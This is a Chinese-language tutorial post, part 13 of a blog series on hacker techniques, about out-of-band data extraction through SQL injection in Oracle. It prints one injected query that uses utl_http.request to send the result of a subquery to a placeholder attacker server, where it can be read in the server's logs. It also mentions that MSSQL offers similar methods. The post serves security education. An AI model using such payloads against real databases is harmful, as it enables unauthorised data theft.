iT邦幫忙

DAY 13
0

駭客手法解析~你不能不知的資安問題!!系列 第 13

SQL Injection pattern〈五〉

  • 分享至 

  • xImage
  •  

資料萃取

Out-of-band:這方法比較機率性,需要 DBMS 有支援並可外連。

以下介紹 oracle 的利用方法:

select * from topic where id = 1 and 1 = utl_http.request('http://yourserver/' || (select version() from dual))

select version() from dual 可以換成任何你想萃取的資料! 要注意的是, oracle 一定要有 from 不能省略,故可利用虛擬資料表 dual 來代替

這時去查詢你 server 的 log 就能看到剛剛回傳的結果了。

另有其他 out-of-band 用法,在 MSSQL 也有類似的利用方法,此處提供關鍵字供讀者自行查詢!


上一篇
SQL Injection pattern〈四〉
下一篇
SQL Injection -- WAF 繞過
系列文
駭客手法解析~你不能不知的資安問題!!30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言